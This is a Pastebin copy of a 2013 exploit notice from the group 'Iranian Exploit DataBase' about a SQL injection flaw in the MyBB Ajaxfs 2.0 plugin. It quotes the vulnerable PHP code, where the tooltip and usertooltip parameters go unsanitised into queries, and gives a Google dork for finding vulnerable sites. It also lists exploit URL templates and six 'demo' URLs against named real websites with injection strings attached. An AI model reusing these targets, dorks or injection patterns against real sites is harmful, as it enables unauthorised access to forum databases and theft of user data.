Googleinurl

Sql Injection vulnerability In Mybb Ajaxfs Plugin Version 2.

Nov 27th, 2013
962
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Sql Injection vulnerability In Mybb Ajaxfs Plugin Version 2.0
  2.  
  3. #################################
  4. #
  5. # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
  6. # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
  7. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
  8. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
  9. # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
  10. # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
  11. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
  12. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
  13. # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
  14. #
  15. #####################################
  16.  
  17. # Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
  18.  
  19. # Author : Iranian Exploit DataBase
  20.  
  21. # Discovered By : IeDb
  22.  
  23. # Email : IeDb.Team (at) Gmail (dot) com [email concealed] - o0_iedb_0o (at) yahoo (dot) com [email concealed]
  24.  
  25. # Home : http://iedb.ir - http://iedb.ir/acc
  26.  
  27. # Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/19926686
  28. 0256538
  29.  
  30. # Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
  31.  
  32. # Security Risk : High
  33.  
  34. # Tested on : Linux
  35.  
  36. # Dork : inurl:ajaxfs.php
  37.  
  38. #################################
  39.  
  40. 1)
  41.  
  42. if(isset($_GET['tooltip']))
  43. {
  44. $pid=$_GET['tooltip'];
  45. $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
  46.  
  47.  
  48. 2)
  49.  
  50. if(isset($_GET['usertooltip']))
  51. {
  52. $uid=$_GET['usertooltip'];
  53. $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
  54.  
  55. http://localhost/Upload/ajaxfs.php?usertooltip=1'
  56.  
  57. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
  58.  
  59. Google DORK : inurl:ajaxfs.php
  60.  
  61.  
  62. # Exploit :
  63.  
  64. # http://site.com/mybb/ajaxfs.php?tooltip=[sql]
  65.  
  66. # http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
  67.  
  68. # Dem0 :
  69.  
  70. # http://www.forum.birahy.com/ajaxfs.php?tooltip=mostreffer'
  71.  
  72. # http://www.tamishe.ir/ajaxfs.php?tooltip=mostreffer'
  73.  
  74. # http://www.opencartvn.com/forum/ajaxfs.php?tooltip=mostreffer'
  75.  
  76. # http://freenimbuzz.takbb.com/_mybb_/ajaxfs.php?tooltip='
  77.  
  78. # http://dvlottery.us/ajaxfs.php?tooltip=13349'
  79.  
  80. # http://www.taltallon.com/forum/ajaxfs.php?tooltip=mostreffer'
  81.  
  82. #################################
  83.  
  84. # Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
  85.  
  86. #################################
  87.  
  88. # Exploit Archive = http://www.iedb.ir/exploits-889.html
  89.  
  90. #################################
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×